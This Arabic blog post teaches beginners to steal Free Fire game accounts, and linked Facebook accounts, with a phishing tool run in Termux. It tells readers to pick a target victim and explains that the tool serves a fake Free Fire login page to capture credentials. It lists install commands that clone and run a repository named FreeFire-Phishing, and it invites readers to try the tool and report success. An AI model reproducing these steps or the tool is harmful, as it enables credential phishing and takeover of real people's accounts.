طريقة فري فاير بطريقة سهلة Hack Free Fire Using Termux

 تهكير فري فاير بطريقة سهلة اذا كنت تبحث عن طريقة رائعه وسهله للغايه لتهكير لعبه فري فاير فهذا المقال سيكون مصدر فائدة لك وبطبع يمكنك تهكير لعبه وتعتبر هذه الطريقة من اقوى هكر فري فاير دون الحاجة لأي خبرة مسبقة في مجال التهكير الحسابات بل يمكن لأي شخص مبتدء ان يقوم بتتلك الطريقة السعله فكل ما سوف تحتاجه بعض الأدوات والتعليمات ثم تحديد الحدف الذي تريد تهكير حسابه وما سوف نفعله بعدها تفعيل هكر فري فاير في تطبيق Termux للأختراق .

طريقة تهكير فري فاير بطريقة سهلة Hack Free Fire Using Termux

طريقة فري فاير بطريقة سهلة Hack Free Fire Using Termux

بتأكيد يمكنك تهكير فري فاير بطريقة سهلة وبدون اي تعقيد من خلال سكربت بسيط يقوم بأنشاء صفحه مزورة مطابقة لموقع Free Fire مما يعني انك سوف تخدع الضحيه بأجبارة على كتابة حسابه وبمجرد ان يقوم بذالك سوف تخترقه , ربما تجد ان الموضوع بسيط وتافه لك هذه الحيله دائماً ما تنطلي على الكثير وخاصه في تهكير الحسابات وتعتبر هذه الطريقه اقوى هكر فري فاير قد تجدة على الأنترنت نظراً انها سهله ونسبه نجاحها عاليه جداً .

وليس هذا وحسب بل يمكنك ايضاً تهكير حساب الفيسبوك فكما نعلم ان بعض الحسابات تكون مرتبطع في اميل شخصي على facebook لذا يمكن استعمال طريقة تهكير فري فاير 2022  في تهكير الفيسبوك .

متطلبات تهكير حساب فري فير 2022

  • تطبيق تيرمكس للأختراق
  • مساحه خاليه في هاتفك
  • تحديد الشخص الذي تريد تهكيره
  • أداة تهكير حساب فري فاير

 أوامر تهكير Hack Free Fire

أولاً يجب عليك الأطلاع على موضوع طريقة تثبيت تطبيق termux على الهاتف لكي تقوم بستعماله على هاتفك الذكي ويمكن ايضاً استعمال كالي لنكس اذا اردت ذالك .

  1. pkg remove game -repo
  2. pkg remove science -repo
  3. apt update
  4. apt upgrade
  5. pkg install git
  6. pkg install wget
  7. git clone https://github.com/OnlineHacking/FreeFire-Phishing
  8. chmod +x*
  9. bash Android-Setup
  10. FreeFire-Phishing

 

تهكير Hack Free Fire
تهكير Hack Free Fire

بعد تشغل أداة تهكير حساب فري فاير سوف يظهر لك الأداة بشكل التالي فكما ترى يوجد عدة خصائص ومميزات يمكنك استخدامها في تهكير فري فاير مثل تهكير فري فاير هيد شوت وايضاً تهكيرجواهر فري فاير والعديد من الأمور , انصحك بتجربتها واخبرنا هل استطعت تهكير حساب فري فاير .

Shadow Hacker
بواسطة : Shadow Hacker
Shadow Hacker هي قناة تعليمية حيث أحاول تعليم المبتدئين كل ما هوا مفيد في مجال الهكر والحمايه والمعلوميات ، من خلال شرح البرامج المهمة وبعض من خدمات المواقع ، والتعريف بأفضل طرق الأختراق والحمايه الأنظمة والحسابات ... اذا كان لديك اي استفسار لا تتردد في الأتصال بي
تعليقات



حجم الخط
+
16
-
تباعد السطور
+
2
-